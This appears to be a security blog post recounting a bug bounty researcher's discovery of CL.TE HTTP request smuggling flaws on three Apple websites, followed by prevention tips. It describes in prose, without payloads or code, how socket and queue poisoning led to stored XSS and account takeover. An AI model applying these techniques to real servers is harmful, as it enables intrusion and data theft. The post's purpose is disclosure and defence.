What is HTTP Request Smuggling ?
HTTP Request Smuggling (HRS) is a type of cyber attack where an attacker manipulates the way front-end and back-end web servers interpret HTTP requests. This can result in the attacker bypassing security measures and gaining access to sensitive information or functionality. To prevent HTTP Request Smuggling attacks, organizations can use web application firewalls and reverse proxies to detect and block malicious requests.
The Story
A young bug hunter called WhoAmI has discovered several critical HTTP Request Smuggling issues affecting three of Apple’s websites. The hunter has been in the bug bounty scene since 2018. He specializes in web application vulnerabilities. He decided to take a closer look at Apple’s systems after the tech giant blew up in the bug bounty scene. The hunter discovered the request smuggling issues on three domains: business.apple.com, school.apple.com, and mapsconnect.apple.com.
The hunter used the same Request Smuggling technique to exploit each server. He discovered that each server was vulnerable to an HTTP De-sync attack known as HTTP Request Smuggling, specifically a CL.TE Request Smuggling attack.
The vulnerability arose from a mismatch in the front-end server reading the Content-Length header and the back-end server reading the Transfer-Encoding header.
Stored XSS
The hunter was also able to slip a malicious header past the front-end server using a newline character and a space in the header name. Then he quickly started receiving requests from live production users. This case allowing him to redirect JavaScript imports and leading to stored XSS in the host.
This was because the exploit allowed the attacker to redirect live users to their server by sending a request to a JavaScript file that would hit a poisoned socket. The poisoned socket, in turn, would redirect the request to the attacker’s JavaScript file located on their server. This caused the file to be loaded and executed on the user’s device.
This could potentially lead to stored cross-site scripting (XSS) The servers were also vulnerable to queue poisoning, which allowed the hunter to smuggle a complete request and break the response queue, leading to data disclosure and account takeover.
Other vectors were usable as well, such as bypassing access control rules on a directory.
Apple quickly responded and remediated the issues. Apple rewarding each domain with a $12,000 bounty for a total reward of $36,000.
The hunter plans to continue sharing interesting bugs and research in the future through bug bounty write-ups.
This report serves as a reminder for organizations to continuously check the security of their web applications. Developers must prioritize fixing any vulnerabilities.
How to Prevent HTTP Requst Smuggling?
To prevent HRS, you can take the following steps:
- Implement strict input validation: This can help prevent attackers from inserting malicious code into HTTP requests.
- Use a secure proxy server: A secure proxy server can help detect and block HRS attacks by identifying and filtering out malicious HTTP requests.
- Use the latest HTTP protocol: Use the latest version of the HTTP protocol, as it may have built-in protections against HRS attacks.
- Keep software up-to-date: Keeping software up-to-date can help prevent HRS attacks by ensuring that any known vulnerabilities are patched.
- Conduct regular security assessments: Regularly assess your web application for vulnerabilities, including HRS, so that any weaknesses can be addressed before they can be exploited.
- Use a web application firewall (WAF): A WAF can help detect and block HRS attacks by analyzing incoming traffic and blocking any requests that are deemed malicious.
By taking these steps, you can help protect your web application from HTTP Request Smuggling attacks and prevent unauthorized access or data theft.
Link to write up: here
Save the PDF here
